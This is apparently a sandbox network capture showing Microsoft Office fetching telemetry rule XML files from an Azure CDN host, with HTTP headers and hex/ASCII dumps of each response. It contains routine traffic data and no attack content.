                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:41 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    89192.168.2.64979513.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:40 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:41 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1358
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 0b7a0bcb-d01e-0082-68c5-45e489000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010041Z-1746fd949bdwt8wrhC1EWRu6rg00000000mg00000000c3n9
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:41 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    90192.168.2.64979613.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:41 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:42 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:41 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1395
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 2e27a562-801e-00a0-79cb-452196000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010041Z-1746fd949bdkw94lhC1EWRxuz400000000mg00000000bfg9
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:42 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    91192.168.2.64979713.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:42 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:42 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:42 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1358
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 3452a663-f01e-003c-1f91-3f8cf0000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010042Z-174f7845968xr5c2hC1EWRd0hn0000000rng000000003vfa
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:42 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    92192.168.2.64979913.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:43 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:43 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1352
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 717d5930-e01e-001f-2a2b-441633000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010043Z-174f78459684bddphC1EWRbht400000016dg00000000f56e
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:43 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    93192.168.2.64979813.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:43 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:43 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1389
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 179ef32c-501e-0016-1fc5-43181b000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010043Z-174f7845968jrjrxhC1EWRmmrs00000016yg0000000023yg
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:43 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    94192.168.2.64980013.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:43 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:43 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1405
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: c77b1400-401e-0048-71d2-450409000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010043Z-1746fd949bdjrnwqhC1EWRpg2800000000h00000000047pc
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:43 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    95192.168.2.64980113.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:44 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:44 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:44 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1368
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 14abde1b-801e-0047-6aab-437265000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010044Z-174f78459685m244hC1EWRgp2c00000016n0000000004336
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:44 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    96192.168.2.64980213.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:44 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:44 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:44 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1401
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: e9f7249a-b01e-00ab-72be-42dafd000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010044Z-174f7845968jrjrxhC1EWRmmrs00000016ug00000000caqh
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:44 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    97192.168.2.64980413.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:45 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
